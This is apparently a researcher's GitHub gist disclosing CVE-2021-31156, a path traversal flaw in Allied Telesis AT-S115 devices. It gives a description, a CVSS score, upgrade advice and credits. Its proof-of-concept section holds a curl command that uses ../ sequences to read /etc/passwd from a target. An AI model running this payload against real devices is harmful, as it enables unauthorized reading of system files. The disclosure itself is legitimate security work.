Skip to content

Instantly share code, notes, and snippets.

@NitescuLucian
Last active March 27, 2024 11:07
Show Gist options
  • Save NitescuLucian/69cf22d17bf190325118304be04828e8 to your computer and use it in GitHub Desktop.
Save NitescuLucian/69cf22d17bf190325118304be04828e8 to your computer and use it in GitHub Desktop.

CVE-2021-31156

Description

Allied Telesis AT-S115 1.2.0 devices, operating on versions prior to 1.00.024 and equipped with Boot Loader version 1.00.006, are susceptible to a Path Traversal vulnerability. This security flaw permits unauthorized users to bypass normal access controls remotely and navigate the device's directory structure to access internal system files directly. Path Traversal attacks, exploit insufficient security validation/sanitization of user-supplied input file paths. By manipulating variables that reference files with dot-dot-slash (../) sequences and similar techniques, attackers can access files and directories stored outside the intended restricted directory. This can lead to information disclosure, unauthorized access, and potentially further system exploitation if sensitive files are exposed. Organizations and individuals using affected versions of Allied Telesis AT-S115 1.2.0 devices are advised to upgrade to latest security supported version to mitigate this vulnerability and protect against potential security breaches.

Common Weakness Enumeration (CWE)

CVSSv3.1 Score: 7.5

Proof of Concept (POC)

To exploit this vulnerability, an attacker has to execute the following command over the affected asset web interface:

curl --path-as-is http://<target>/../../../../../../../../../../../../../etc/passwd

Other references

Acknowledgements

This vulnerability has been identified under Bit Sentinel Red Team, which aknowlages the following team as the authors of this finding:

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment